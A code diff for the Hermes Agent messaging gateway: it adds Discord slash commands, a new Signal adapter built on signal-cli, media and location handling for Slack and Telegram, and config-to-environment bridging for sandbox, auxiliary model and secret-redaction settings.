@@ -555,6 +592,89 @@ class DiscordAdapter(BasePlatformAdapter):
except Exception as e:
logger.debug("Discord followup failed: %s", e)
@tree.command(name="compress", description="Compress conversation context")
async def slash_compress(interaction: discord.Interaction):
await interaction.response.defer(ephemeral=True)
event = self._build_slash_event(interaction, "/compress")
await self.handle_message(event)
try:
await interaction.followup.send("Done~", ephemeral=True)
except Exception as e:
logger.debug("Discord followup failed: %s", e)
@tree.command(name="title", description="Set or show the session title")
@discord.app_commands.describe(name="Session title. Leave empty to show current.")
async def slash_title(interaction: discord.Interaction, name: str = ""):
await interaction.response.defer(ephemeral=True)
event = self._build_slash_event(interaction, f"/title {name}".strip())
await self.handle_message(event)
try:
await interaction.followup.send("Done~", ephemeral=True)
except Exception as e:
logger.debug("Discord followup failed: %s", e)
@tree.command(name="resume", description="Resume a previously-named session")
@discord.app_commands.describe(name="Session name to resume. Leave empty to list sessions.")
async def slash_resume(interaction: discord.Interaction, name: str = ""):
await interaction.response.defer(ephemeral=True)
event = self._build_slash_event(interaction, f"/resume {name}".strip())
await self.handle_message(event)
try:
await interaction.followup.send("Done~", ephemeral=True)
except Exception as e:
logger.debug("Discord followup failed: %s", e)
@tree.command(name="usage", description="Show token usage for this session")
async def slash_usage(interaction: discord.Interaction):
await interaction.response.defer(ephemeral=True)
event = self._build_slash_event(interaction, "/usage")
await self.handle_message(event)
try:
await interaction.followup.send("Done~", ephemeral=True)
except Exception as e:
logger.debug("Discord followup failed: %s", e)
@tree.command(name="provider", description="Show available providers")
async def slash_provider(interaction: discord.Interaction):
await interaction.response.defer(ephemeral=True)
event = self._build_slash_event(interaction, "/provider")
await self.handle_message(event)
try:
await interaction.followup.send("Done~", ephemeral=True)
except Exception as e:
logger.debug("Discord followup failed: %s", e)
@tree.command(name="help", description="Show available commands")
async def slash_help(interaction: discord.Interaction):
await interaction.response.defer(ephemeral=True)
event = self._build_slash_event(interaction, "/help")
await self.handle_message(event)
try:
await interaction.followup.send("Done~", ephemeral=True)
except Exception as e:
logger.debug("Discord followup failed: %s", e)
@tree.command(name="insights", description="Show usage insights and analytics")
@discord.app_commands.describe(days="Number of days to analyze (default: 7)")
async def slash_insights(interaction: discord.Interaction, days: int = 7):
await interaction.response.defer(ephemeral=True)
event = self._build_slash_event(interaction, f"/insights {days}")
await self.handle_message(event)
try:
await interaction.followup.send("Done~", ephemeral=True)
except Exception as e:
logger.debug("Discord followup failed: %s", e)
@tree.command(name="reload-mcp", description="Reload MCP servers from config")
async def slash_reload_mcp(interaction: discord.Interaction):
await interaction.response.defer(ephemeral=True)
event = self._build_slash_event(interaction, "/reload-mcp")
await self.handle_message(event)
try:
await interaction.followup.send("Done~", ephemeral=True)
except Exception as e:
logger.debug("Discord followup failed: %s", e)
@tree.command(name="update", description="Update Hermes Agent to the latest version")
async def slash_update(interaction: discord.Interaction):
await interaction.response.defer(ephemeral=True)

716
gateway/platforms/signal.py Normal file
View File

@@ -0,0 +1,716 @@
"""Signal messenger platform adapter.
Connects to a signal-cli daemon running in HTTP mode.
Inbound messages arrive via SSE (Server-Sent Events) streaming.
Outbound messages and actions use JSON-RPC 2.0 over HTTP.
Based on PR #268 by ibhagwan, rebuilt with bug fixes.
Requires:
- signal-cli installed and running: signal-cli daemon --http 127.0.0.1:8080
- SIGNAL_HTTP_URL and SIGNAL_ACCOUNT environment variables set
"""
import asyncio
import base64
import json
import logging
import os
import random
import re
import time
from datetime import datetime, timezone
from pathlib import Path
from typing import Dict, List, Optional, Any
from urllib.parse import unquote
import httpx
from gateway.config import Platform, PlatformConfig
from gateway.platforms.base import (
BasePlatformAdapter,
MessageEvent,
MessageType,
SendResult,
cache_image_from_bytes,
cache_audio_from_bytes,
cache_document_from_bytes,
cache_image_from_url,
)
logger = logging.getLogger(__name__)
# ---------------------------------------------------------------------------
# Constants
# ---------------------------------------------------------------------------
SIGNAL_MAX_ATTACHMENT_SIZE = 100 * 1024 * 1024 # 100 MB
MAX_MESSAGE_LENGTH = 8000 # Signal message size limit
TYPING_INTERVAL = 8.0 # seconds between typing indicator refreshes
SSE_RETRY_DELAY_INITIAL = 2.0
SSE_RETRY_DELAY_MAX = 60.0
HEALTH_CHECK_INTERVAL = 30.0 # seconds between health checks
HEALTH_CHECK_STALE_THRESHOLD = 120.0 # seconds without SSE activity before concern
# E.164 phone number pattern for redaction
_PHONE_RE = re.compile(r"\+[1-9]\d{6,14}")
# ---------------------------------------------------------------------------
# Helpers
# ---------------------------------------------------------------------------
def _redact_phone(phone: str) -> str:
"""Redact a phone number for logging: +15551234567 -> +155****4567."""
if not phone:
return "<none>"
if len(phone) <= 8:
return phone[:2] + "****" + phone[-2:] if len(phone) > 4 else "****"
return phone[:4] + "****" + phone[-4:]
def _parse_comma_list(value: str) -> List[str]:
"""Split a comma-separated string into a list, stripping whitespace."""
return [v.strip() for v in value.split(",") if v.strip()]
def _guess_extension(data: bytes) -> str:
"""Guess file extension from magic bytes."""
if data[:4] == b"\x89PNG":
return ".png"
if data[:2] == b"\xff\xd8":
return ".jpg"
if data[:4] == b"GIF8":
return ".gif"
if len(data) >= 12 and data[:4] == b"RIFF" and data[8:12] == b"WEBP":
return ".webp"
if data[:4] == b"%PDF":
return ".pdf"
if len(data) >= 8 and data[4:8] == b"ftyp":
return ".mp4"
if data[:4] == b"OggS":
return ".ogg"
if len(data) >= 2 and data[0] == 0xFF and (data[1] & 0xE0) == 0xE0:
return ".mp3"
if data[:2] == b"PK":
return ".zip"
return ".bin"
def _is_image_ext(ext: str) -> bool:
return ext.lower() in (".jpg", ".jpeg", ".png", ".gif", ".webp")
def _is_audio_ext(ext: str) -> bool:
return ext.lower() in (".mp3", ".wav", ".ogg", ".m4a", ".aac")
def _render_mentions(text: str, mentions: list) -> str:
"""Replace Signal mention placeholders (\\uFFFC) with readable @identifiers.
Signal encodes @mentions as the Unicode object replacement character
with out-of-band metadata containing the mentioned user's UUID/number.
"""
if not mentions or "\uFFFC" not in text:
return text
# Sort mentions by start position (reverse) to replace from end to start
# so indices don't shift as we replace
sorted_mentions = sorted(mentions, key=lambda m: m.get("start", 0), reverse=True)
for mention in sorted_mentions:
start = mention.get("start", 0)
length = mention.get("length", 1)
# Use the mention's number or UUID as the replacement
identifier = mention.get("number") or mention.get("uuid") or "user"
replacement = f"@{identifier}"
text = text[:start] + replacement + text[start + length:]
return text
def check_signal_requirements() -> bool:
"""Check if Signal is configured (has URL and account)."""
return bool(os.getenv("SIGNAL_HTTP_URL") and os.getenv("SIGNAL_ACCOUNT"))
# ---------------------------------------------------------------------------
# Signal Adapter
# ---------------------------------------------------------------------------
class SignalAdapter(BasePlatformAdapter):
"""Signal messenger adapter using signal-cli HTTP daemon."""
platform = Platform.SIGNAL
def __init__(self, config: PlatformConfig):
super().__init__(config, Platform.SIGNAL)
extra = config.extra or {}
self.http_url = extra.get("http_url", "http://127.0.0.1:8080").rstrip("/")
self.account = extra.get("account", "")
self.ignore_stories = extra.get("ignore_stories", True)
# Parse allowlists — group policy is derived from presence of group allowlist
group_allowed_str = os.getenv("SIGNAL_GROUP_ALLOWED_USERS", "")
self.group_allow_from = set(_parse_comma_list(group_allowed_str))
# HTTP client
self.client: Optional[httpx.AsyncClient] = None
# Background tasks
self._sse_task: Optional[asyncio.Task] = None
self._health_monitor_task: Optional[asyncio.Task] = None
self._typing_tasks: Dict[str, asyncio.Task] = {}
self._running = False
self._last_sse_activity = 0.0
self._sse_response: Optional[httpx.Response] = None
# Normalize account for self-message filtering
self._account_normalized = self.account.strip()
logger.info("Signal adapter initialized: url=%s account=%s groups=%s",
self.http_url, _redact_phone(self.account),
"enabled" if self.group_allow_from else "disabled")
# ------------------------------------------------------------------
# Lifecycle
# ------------------------------------------------------------------
async def connect(self) -> bool:
"""Connect to signal-cli daemon and start SSE listener."""
if not self.http_url or not self.account:
logger.error("Signal: SIGNAL_HTTP_URL and SIGNAL_ACCOUNT are required")
return False
self.client = httpx.AsyncClient(timeout=30.0)
# Health check — verify signal-cli daemon is reachable
try:
resp = await self.client.get(f"{self.http_url}/api/v1/check", timeout=10.0)
if resp.status_code != 200:
logger.error("Signal: health check failed (status %d)", resp.status_code)
return False
except Exception as e:
logger.error("Signal: cannot reach signal-cli at %s: %s", self.http_url, e)
return False
self._running = True
self._last_sse_activity = time.time()
self._sse_task = asyncio.create_task(self._sse_listener())
self._health_monitor_task = asyncio.create_task(self._health_monitor())
logger.info("Signal: connected to %s", self.http_url)
return True
async def disconnect(self) -> None:
"""Stop SSE listener and clean up."""
self._running = False
if self._sse_task:
self._sse_task.cancel()
try:
await self._sse_task
except asyncio.CancelledError:
pass
if self._health_monitor_task:
self._health_monitor_task.cancel()
try:
await self._health_monitor_task
except asyncio.CancelledError:
pass
# Cancel all typing tasks
for task in self._typing_tasks.values():
task.cancel()
self._typing_tasks.clear()
if self.client:
await self.client.aclose()
self.client = None
logger.info("Signal: disconnected")
# ------------------------------------------------------------------
# SSE Streaming (inbound messages)
# ------------------------------------------------------------------
async def _sse_listener(self) -> None:
"""Listen for SSE events from signal-cli daemon."""
url = f"{self.http_url}/api/v1/events?account={self.account}"
backoff = SSE_RETRY_DELAY_INITIAL
while self._running:
try:
logger.debug("Signal SSE: connecting to %s", url)
async with self.client.stream(
"GET", url,
headers={"Accept": "text/event-stream"},
timeout=None,
) as response:
self._sse_response = response
backoff = SSE_RETRY_DELAY_INITIAL # Reset on successful connection
self._last_sse_activity = time.time()
logger.info("Signal SSE: connected")
buffer = ""
async for chunk in response.aiter_text():
if not self._running:
break
buffer += chunk
while "\n" in buffer:
line, buffer = buffer.split("\n", 1)
line = line.strip()
if not line:
continue
# Parse SSE data lines
if line.startswith("data:"):
data_str = line[5:].strip()
if not data_str:
continue
self._last_sse_activity = time.time()
try:
data = json.loads(data_str)
await self._handle_envelope(data)
except json.JSONDecodeError:
logger.debug("Signal SSE: invalid JSON: %s", data_str[:100])
except Exception:
logger.exception("Signal SSE: error handling event")
except asyncio.CancelledError:
break
except httpx.HTTPError as e:
if self._running:
logger.warning("Signal SSE: HTTP error: %s (reconnecting in %.0fs)", e, backoff)
except Exception as e:
if self._running:
logger.warning("Signal SSE: error: %s (reconnecting in %.0fs)", e, backoff)
if self._running:
# Add 20% jitter to prevent thundering herd on reconnection
jitter = backoff * 0.2 * random.random()
await asyncio.sleep(backoff + jitter)
backoff = min(backoff * 2, SSE_RETRY_DELAY_MAX)
self._sse_response = None
# ------------------------------------------------------------------
# Health Monitor
# ------------------------------------------------------------------
async def _health_monitor(self) -> None:
"""Monitor SSE connection health and force reconnect if stale."""
while self._running:
await asyncio.sleep(HEALTH_CHECK_INTERVAL)
if not self._running:
break
elapsed = time.time() - self._last_sse_activity
if elapsed > HEALTH_CHECK_STALE_THRESHOLD:
logger.warning("Signal: SSE idle for %.0fs, checking daemon health", elapsed)
try:
resp = await self.client.get(
f"{self.http_url}/api/v1/check", timeout=10.0
)
if resp.status_code == 200:
# Daemon is alive but SSE is idle — update activity to
# avoid repeated warnings (connection may just be quiet)
self._last_sse_activity = time.time()
logger.debug("Signal: daemon healthy, SSE idle")
else:
logger.warning("Signal: health check failed (%d), forcing reconnect", resp.status_code)
self._force_reconnect()
except Exception as e:
logger.warning("Signal: health check error: %s, forcing reconnect", e)
self._force_reconnect()
def _force_reconnect(self) -> None:
"""Force SSE reconnection by closing the current response."""
if self._sse_response and not self._sse_response.is_stream_consumed:
try:
asyncio.create_task(self._sse_response.aclose())
except Exception:
pass
self._sse_response = None
# ------------------------------------------------------------------
# Message Handling
# ------------------------------------------------------------------
async def _handle_envelope(self, envelope: dict) -> None:
"""Process an incoming signal-cli envelope."""
# Unwrap nested envelope if present
envelope_data = envelope.get("envelope", envelope)
# Filter syncMessage envelopes (sent transcripts, read receipts, etc.)
# signal-cli may set syncMessage to null vs omitting it, so check key existence
if "syncMessage" in envelope_data:
return
# Extract sender info
sender = (
envelope_data.get("sourceNumber")
or envelope_data.get("sourceUuid")
or envelope_data.get("source")
)
sender_name = envelope_data.get("sourceName", "")
sender_uuid = envelope_data.get("sourceUuid", "")
if not sender:
logger.debug("Signal: ignoring envelope with no sender")
return
# Self-message filtering — prevent reply loops
if self._account_normalized and sender == self._account_normalized:
return
# Filter stories
if self.ignore_stories and envelope_data.get("storyMessage"):
return
# Get data message — also check editMessage (edited messages contain
# their updated dataMessage inside editMessage.dataMessage)
data_message = (
envelope_data.get("dataMessage")
or (envelope_data.get("editMessage") or {}).get("dataMessage")
)
if not data_message:
return
# Check for group message
group_info = data_message.get("groupInfo")
group_id = group_info.get("groupId") if group_info else None
is_group = bool(group_id)
# Group message filtering — derived from SIGNAL_GROUP_ALLOWED_USERS:
# - No env var set → groups disabled (default safe behavior)
# - Env var set with group IDs → only those groups allowed
# - Env var set with "*" → all groups allowed
# DM auth is fully handled by run.py (_is_user_authorized)
if is_group:
if not self.group_allow_from:
logger.debug("Signal: ignoring group message (no SIGNAL_GROUP_ALLOWED_USERS)")
return
if "*" not in self.group_allow_from and group_id not in self.group_allow_from:
logger.debug("Signal: group %s not in allowlist", group_id[:8] if group_id else "?")
return
# Build chat info
chat_id = sender if not is_group else f"group:{group_id}"
chat_type = "group" if is_group else "dm"
# Extract text and render mentions
text = data_message.get("message", "")
mentions = data_message.get("mentions", [])
if text and mentions:
text = _render_mentions(text, mentions)
# Process attachments
attachments_data = data_message.get("attachments", [])
image_paths = []
audio_path = None
document_paths = []
if attachments_data and not getattr(self, "ignore_attachments", False):
for att in attachments_data:
att_id = att.get("id")
att_size = att.get("size", 0)
if not att_id:
continue
if att_size > SIGNAL_MAX_ATTACHMENT_SIZE:
logger.warning("Signal: attachment too large (%d bytes), skipping", att_size)
continue
try:
cached_path, ext = await self._fetch_attachment(att_id)
if cached_path:
if _is_image_ext(ext):
image_paths.append(cached_path)
elif _is_audio_ext(ext):
audio_path = cached_path
else:
document_paths.append(cached_path)
except Exception:
logger.exception("Signal: failed to fetch attachment %s", att_id)
# Build session source
source = self.build_source(
chat_id=chat_id,
chat_name=group_info.get("groupName") if group_info else sender_name,
chat_type=chat_type,
user_id=sender,
user_name=sender_name or sender,
user_id_alt=sender_uuid if sender_uuid else None,
chat_id_alt=group_id if is_group else None,
)
# Determine message type
msg_type = MessageType.TEXT
if audio_path:
msg_type = MessageType.VOICE
elif image_paths:
msg_type = MessageType.IMAGE
# Parse timestamp from envelope data (milliseconds since epoch)
ts_ms = envelope_data.get("timestamp", 0)
if ts_ms:
try:
timestamp = datetime.fromtimestamp(ts_ms / 1000, tz=timezone.utc)
except (ValueError, OSError):
timestamp = datetime.now(tz=timezone.utc)
else:
timestamp = datetime.now(tz=timezone.utc)
# Build and dispatch event
event = MessageEvent(
source=source,
text=text or "",
message_type=msg_type,
image_paths=image_paths,
audio_path=audio_path,
document_paths=document_paths,
timestamp=timestamp,
)
logger.debug("Signal: message from %s in %s: %s",
_redact_phone(sender), chat_id[:20], (text or "")[:50])
await self.handle_message(event)
# ------------------------------------------------------------------
# Attachment Handling
# ------------------------------------------------------------------
async def _fetch_attachment(self, attachment_id: str) -> tuple:
"""Fetch an attachment via JSON-RPC and cache it. Returns (path, ext)."""
result = await self._rpc("getAttachment", {
"account": self.account,
"attachmentId": attachment_id,
})
if not result:
return None, ""
# Result is base64-encoded file content
raw_data = base64.b64decode(result)
ext = _guess_extension(raw_data)
if _is_image_ext(ext):
path = cache_image_from_bytes(raw_data, ext)
elif _is_audio_ext(ext):
path = cache_audio_from_bytes(raw_data, ext)
else:
path = cache_document_from_bytes(raw_data, ext)
return path, ext
# ------------------------------------------------------------------
# JSON-RPC Communication
# ------------------------------------------------------------------
async def _rpc(self, method: str, params: dict, rpc_id: str = None) -> Any:
"""Send a JSON-RPC 2.0 request to signal-cli daemon."""
if not self.client:
logger.warning("Signal: RPC called but client not connected")
return None
if rpc_id is None:
rpc_id = f"{method}_{int(time.time() * 1000)}"
payload = {
"jsonrpc": "2.0",
"method": method,
"params": params,
"id": rpc_id,
}
try:
resp = await self.client.post(
f"{self.http_url}/api/v1/rpc",
json=payload,
timeout=30.0,
)
resp.raise_for_status()
data = resp.json()
if "error" in data:
logger.warning("Signal RPC error (%s): %s", method, data["error"])
return None
return data.get("result")
except Exception as e:
logger.warning("Signal RPC %s failed: %s", method, e)
return None
# ------------------------------------------------------------------
# Sending
# ------------------------------------------------------------------
async def send(
self,
chat_id: str,
text: str,
reply_to_message_id: Optional[str] = None,
**kwargs,
) -> SendResult:
"""Send a text message."""
await self._stop_typing_indicator(chat_id)
params: Dict[str, Any] = {
"account": self.account,
"message": text,
}
if chat_id.startswith("group:"):
params["groupId"] = chat_id[6:]
else:
params["recipient"] = [chat_id]
result = await self._rpc("send", params)
if result is not None:
return SendResult(success=True)
return SendResult(success=False, error="RPC send failed")
async def send_typing(self, chat_id: str) -> None:
"""Send a typing indicator."""
params: Dict[str, Any] = {
"account": self.account,
}
if chat_id.startswith("group:"):
params["groupId"] = chat_id[6:]
else:
params["recipient"] = [chat_id]
await self._rpc("sendTyping", params, rpc_id="typing")
async def send_image(
self,
chat_id: str,
image_url: str,
caption: Optional[str] = None,
**kwargs,
) -> SendResult:
"""Send an image. Supports http(s):// and file:// URLs."""
await self._stop_typing_indicator(chat_id)
# Resolve image to local path
if image_url.startswith("file://"):
file_path = unquote(image_url[7:])
else:
# Download remote image to cache
try:
file_path = await cache_image_from_url(image_url)
except Exception as e:
logger.warning("Signal: failed to download image: %s", e)
return SendResult(success=False, error=str(e))
if not file_path or not Path(file_path).exists():
return SendResult(success=False, error="Image file not found")
# Validate size
file_size = Path(file_path).stat().st_size
if file_size > SIGNAL_MAX_ATTACHMENT_SIZE:
return SendResult(success=False, error=f"Image too large ({file_size} bytes)")
params: Dict[str, Any] = {
"account": self.account,
"message": caption or "",
"attachments": [file_path],
}
if chat_id.startswith("group:"):
params["groupId"] = chat_id[6:]
else:
params["recipient"] = [chat_id]
result = await self._rpc("send", params)
if result is not None:
return SendResult(success=True)
return SendResult(success=False, error="RPC send with attachment failed")
async def send_document(
self,
chat_id: str,
file_path: str,
caption: Optional[str] = None,
filename: Optional[str] = None,
**kwargs,
) -> SendResult:
"""Send a document/file attachment."""
await self._stop_typing_indicator(chat_id)
if not Path(file_path).exists():
return SendResult(success=False, error="File not found")
params: Dict[str, Any] = {
"account": self.account,
"message": caption or "",
"attachments": [file_path],
}
if chat_id.startswith("group:"):
params["groupId"] = chat_id[6:]
else:
params["recipient"] = [chat_id]
result = await self._rpc("send", params)
if result is not None:
return SendResult(success=True)
return SendResult(success=False, error="RPC send document failed")
# ------------------------------------------------------------------
# Typing Indicators
# ------------------------------------------------------------------
async def _start_typing_indicator(self, chat_id: str) -> None:
"""Start a typing indicator loop for a chat."""
if chat_id in self._typing_tasks:
return # Already running
async def _typing_loop():
try:
while True:
await self.send_typing(chat_id)
await asyncio.sleep(TYPING_INTERVAL)
except asyncio.CancelledError:
pass
self._typing_tasks[chat_id] = asyncio.create_task(_typing_loop())
async def _stop_typing_indicator(self, chat_id: str) -> None:
"""Stop a typing indicator loop for a chat."""
task = self._typing_tasks.pop(chat_id, None)
if task:
task.cancel()
try:
await task
except asyncio.CancelledError:
pass
# ------------------------------------------------------------------
# Chat Info
# ------------------------------------------------------------------
async def get_chat_info(self, chat_id: str) -> Dict[str, Any]:
"""Get information about a chat/contact."""
if chat_id.startswith("group:"):
return {
"name": chat_id,
"type": "group",
"chat_id": chat_id,
}
# Try to resolve contact name
result = await self._rpc("getContact", {
"account": self.account,
"contactAddress": chat_id,
})
name = chat_id
if result and isinstance(result, dict):
name = result.get("name") or result.get("profileName") or chat_id
return {
"name": name,
"type": "dm",
"chat_id": chat_id,
}

View File

@@ -179,6 +179,35 @@ class SlackAdapter(BasePlatformAdapter):
"""Slack doesn't have a direct typing indicator API for bots."""
pass
async def send_image_file(
self,
chat_id: str,
image_path: str,
caption: Optional[str] = None,
reply_to: Optional[str] = None,
) -> SendResult:
"""Send a local image file to Slack by uploading it."""
if not self._app:
return SendResult(success=False, error="Not connected")
try:
import os
if not os.path.exists(image_path):
return SendResult(success=False, error=f"Image file not found: {image_path}")
result = await self._app.client.files_upload_v2(
channel=chat_id,
file=image_path,
filename=os.path.basename(image_path),
initial_comment=caption or "",
thread_ts=reply_to,
)
return SendResult(success=True, raw_response=result)
except Exception as e:
print(f"[{self.name}] Failed to send local image: {e}")
return await super().send_image_file(chat_id, image_path, caption, reply_to)
async def send_image(
self,
chat_id: str,

View File

@@ -132,6 +132,10 @@ class TelegramAdapter(BasePlatformAdapter):
filters.COMMAND,
self._handle_command
))
self._app.add_handler(TelegramMessageHandler(
filters.LOCATION | getattr(filters, "VENUE", filters.LOCATION),
self._handle_location_message
))
self._app.add_handler(TelegramMessageHandler(
filters.PHOTO | filters.VIDEO | filters.AUDIO | filters.VOICE | filters.Document.ALL | filters.Sticker.ALL,
self._handle_media_message
@@ -155,6 +159,14 @@ class TelegramAdapter(BasePlatformAdapter):
BotCommand("status", "Show session info"),
BotCommand("stop", "Stop the running agent"),
BotCommand("sethome", "Set this chat as the home channel"),
BotCommand("compress", "Compress conversation context"),
BotCommand("title", "Set or show the session title"),
BotCommand("resume", "Resume a previously-named session"),
BotCommand("usage", "Show token usage for this session"),
BotCommand("provider", "Show available providers"),
BotCommand("insights", "Show usage insights and analytics"),
BotCommand("update", "Update Hermes to the latest version"),
BotCommand("reload_mcp", "Reload MCP servers from config"),
BotCommand("help", "Show available commands"),
])
except Exception as e:
@@ -306,6 +318,92 @@ class TelegramAdapter(BasePlatformAdapter):
print(f"[{self.name}] Failed to send voice/audio: {e}")
return await super().send_voice(chat_id, audio_path, caption, reply_to)
async def send_image_file(
self,
chat_id: str,
image_path: str,
caption: Optional[str] = None,
reply_to: Optional[str] = None,
) -> SendResult:
"""Send a local image file natively as a Telegram photo."""
if not self._bot:
return SendResult(success=False, error="Not connected")
try:
import os
if not os.path.exists(image_path):
return SendResult(success=False, error=f"Image file not found: {image_path}")
with open(image_path, "rb") as image_file:
msg = await self._bot.send_photo(
chat_id=int(chat_id),
photo=image_file,
caption=caption[:1024] if caption else None,
reply_to_message_id=int(reply_to) if reply_to else None,
)
return SendResult(success=True, message_id=str(msg.message_id))
except Exception as e:
print(f"[{self.name}] Failed to send local image: {e}")
return await super().send_image_file(chat_id, image_path, caption, reply_to)
async def send_document(
self,
chat_id: str,
file_path: str,
caption: Optional[str] = None,
file_name: Optional[str] = None,
reply_to: Optional[str] = None,
) -> SendResult:
"""Send a document/file natively as a Telegram file attachment."""
if not self._bot:
return SendResult(success=False, error="Not connected")
try:
if not os.path.exists(file_path):
return SendResult(success=False, error=f"File not found: {file_path}")
display_name = file_name or os.path.basename(file_path)
with open(file_path, "rb") as f:
msg = await self._bot.send_document(
chat_id=int(chat_id),
document=f,
filename=display_name,
caption=caption[:1024] if caption else None,
reply_to_message_id=int(reply_to) if reply_to else None,
)
return SendResult(success=True, message_id=str(msg.message_id))
except Exception as e:
print(f"[{self.name}] Failed to send document: {e}")
return await super().send_document(chat_id, file_path, caption, file_name, reply_to)
async def send_video(
self,
chat_id: str,
video_path: str,
caption: Optional[str] = None,
reply_to: Optional[str] = None,
) -> SendResult:
"""Send a video natively as a Telegram video message."""
if not self._bot:
return SendResult(success=False, error="Not connected")
try:
if not os.path.exists(video_path):
return SendResult(success=False, error=f"Video file not found: {video_path}")
with open(video_path, "rb") as f:
msg = await self._bot.send_video(
chat_id=int(chat_id),
video=f,
caption=caption[:1024] if caption else None,
reply_to_message_id=int(reply_to) if reply_to else None,
)
return SendResult(success=True, message_id=str(msg.message_id))
except Exception as e:
print(f"[{self.name}] Failed to send video: {e}")
return await super().send_video(chat_id, video_path, caption, reply_to)
async def send_image(
self,
chat_id: str,
@@ -313,12 +411,16 @@ class TelegramAdapter(BasePlatformAdapter):
caption: Optional[str] = None,
reply_to: Optional[str] = None,
) -> SendResult:
"""Send an image natively as a Telegram photo."""
"""Send an image natively as a Telegram photo.
Tries URL-based send first (fast, works for <5MB images).
Falls back to downloading and uploading as file (supports up to 10MB).
"""
if not self._bot:
return SendResult(success=False, error="Not connected")
try:
# Telegram can send photos directly from URLs
# Telegram can send photos directly from URLs (up to ~5MB)
msg = await self._bot.send_photo(
chat_id=int(chat_id),
photo=image_url,
@@ -327,9 +429,26 @@ class TelegramAdapter(BasePlatformAdapter):
)
return SendResult(success=True, message_id=str(msg.message_id))
except Exception as e:
print(f"[{self.name}] Failed to send photo, falling back to URL: {e}")
# Fallback: send as text link
return await super().send_image(chat_id, image_url, caption, reply_to)
logger.warning("[%s] URL-based send_photo failed (%s), trying file upload", self.name, e)
# Fallback: download and upload as file (supports up to 10MB)
try:
import httpx
async with httpx.AsyncClient(timeout=30.0) as client:
resp = await client.get(image_url)
resp.raise_for_status()
image_data = resp.content
msg = await self._bot.send_photo(
chat_id=int(chat_id),
photo=image_data,
caption=caption[:1024] if caption else None,
reply_to_message_id=int(reply_to) if reply_to else None,
)
return SendResult(success=True, message_id=str(msg.message_id))
except Exception as e2:
logger.error("[%s] File upload send_photo also failed: %s", self.name, e2)
# Final fallback: send URL as text
return await super().send_image(chat_id, image_url, caption, reply_to)
async def send_animation(
self,
@@ -489,6 +608,41 @@ class TelegramAdapter(BasePlatformAdapter):
event = self._build_message_event(update.message, MessageType.COMMAND)
await self.handle_message(event)
async def _handle_location_message(self, update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:
"""Handle incoming location/venue pin messages."""
if not update.message:
return
msg = update.message
venue = getattr(msg, "venue", None)
location = getattr(venue, "location", None) if venue else getattr(msg, "location", None)
if not location:
return
lat = getattr(location, "latitude", None)
lon = getattr(location, "longitude", None)
if lat is None or lon is None:
return
# Build a text message with coordinates and context
parts = ["[The user shared a location pin.]"]
if venue:
title = getattr(venue, "title", None)
address = getattr(venue, "address", None)
if title:
parts.append(f"Venue: {title}")
if address:
parts.append(f"Address: {address}")
parts.append(f"latitude: {lat}")
parts.append(f"longitude: {lon}")
parts.append(f"Map: https://www.google.com/maps/search/?api=1&query={lat},{lon}")
parts.append("Ask what they'd like to find nearby (restaurants, cafes, etc.) and any preferences.")
event = self._build_message_event(msg, MessageType.LOCATION)
event.text = "\n".join(parts)
await self.handle_message(event)
async def _handle_media_message(self, update: Update, context: ContextTypes.DEFAULT_TYPE) -> None:
"""Handle incoming media messages, downloading images to local cache."""
if not update.message:

View File

@@ -75,6 +75,7 @@ if _config_path.exists():
"container_memory": "TERMINAL_CONTAINER_MEMORY",
"container_disk": "TERMINAL_CONTAINER_DISK",
"container_persistent": "TERMINAL_CONTAINER_PERSISTENT",
"sandbox_dir": "TERMINAL_SANDBOX_DIR",
}
for _cfg_key, _env_var in _terminal_env_map.items():
if _cfg_key in _terminal_cfg:
@@ -85,10 +86,29 @@ if _config_path.exists():
"enabled": "CONTEXT_COMPRESSION_ENABLED",
"threshold": "CONTEXT_COMPRESSION_THRESHOLD",
"summary_model": "CONTEXT_COMPRESSION_MODEL",
"summary_provider": "CONTEXT_COMPRESSION_PROVIDER",
}
for _cfg_key, _env_var in _compression_env_map.items():
if _cfg_key in _compression_cfg:
os.environ[_env_var] = str(_compression_cfg[_cfg_key])
# Auxiliary model overrides (vision, web_extract).
# Each task has provider + model; bridge non-default values to env vars.
_auxiliary_cfg = _cfg.get("auxiliary", {})
if _auxiliary_cfg and isinstance(_auxiliary_cfg, dict):
_aux_task_env = {
"vision": ("AUXILIARY_VISION_PROVIDER", "AUXILIARY_VISION_MODEL"),
"web_extract": ("AUXILIARY_WEB_EXTRACT_PROVIDER", "AUXILIARY_WEB_EXTRACT_MODEL"),
}
for _task_key, (_prov_env, _model_env) in _aux_task_env.items():
_task_cfg = _auxiliary_cfg.get(_task_key, {})
if not isinstance(_task_cfg, dict):
continue
_prov = str(_task_cfg.get("provider", "")).strip()
_model = str(_task_cfg.get("model", "")).strip()
if _prov and _prov != "auto":
os.environ[_prov_env] = _prov
if _model:
os.environ[_model_env] = _model
_agent_cfg = _cfg.get("agent", {})
if _agent_cfg and isinstance(_agent_cfg, dict):
if "max_turns" in _agent_cfg:
@@ -98,6 +118,12 @@ if _config_path.exists():
_tz_cfg = _cfg.get("timezone", "")
if _tz_cfg and isinstance(_tz_cfg, str) and "HERMES_TIMEZONE" not in os.environ:
os.environ["HERMES_TIMEZONE"] = _tz_cfg.strip()
# Security settings
_security_cfg = _cfg.get("security", {})
if isinstance(_security_cfg, dict):
_redact = _security_cfg.get("redact_secrets")
if _redact is not None:
os.environ["HERMES_REDACT_SECRETS"] = str(_redact).lower()
except Exception:
pass # Non-fatal; gateway can still run with .env values
@@ -107,11 +133,13 @@ os.environ["HERMES_QUIET"] = "1"
# Enable interactive exec approval for dangerous commands on messaging platforms
os.environ["HERMES_EXEC_ASK"] = "1"
# Set terminal working directory for messaging platforms
# Uses MESSAGING_CWD if set, otherwise defaults to home directory
# This is separate from CLI which uses the directory where `hermes` is run
messaging_cwd = os.getenv("MESSAGING_CWD") or str(Path.home())
os.environ["TERMINAL_CWD"] = messaging_cwd
# Set terminal working directory for messaging platforms.
# If the user set an explicit path in config.yaml (not "." or "auto"),
# respect it. Otherwise use MESSAGING_CWD or default to home directory.
_configured_cwd = os.environ.get("TERMINAL_CWD", "")
if not _configured_cwd or _configured_cwd in (".", "auto", "cwd"):
messaging_cwd = os.getenv("MESSAGING_CWD") or str(Path.home())
os.environ["TERMINAL_CWD"] = messaging_cwd
from gateway.config import (
Platform,
@@ -172,13 +200,13 @@ class GatewayRunner:
self._ephemeral_system_prompt = self._load_ephemeral_system_prompt()
self._reasoning_config = self._load_reasoning_config()
self._provider_routing = self._load_provider_routing()
self._fallback_model = self._load_fallback_model()
# Wire process registry into session store for reset protection
from tools.process_registry import process_registry
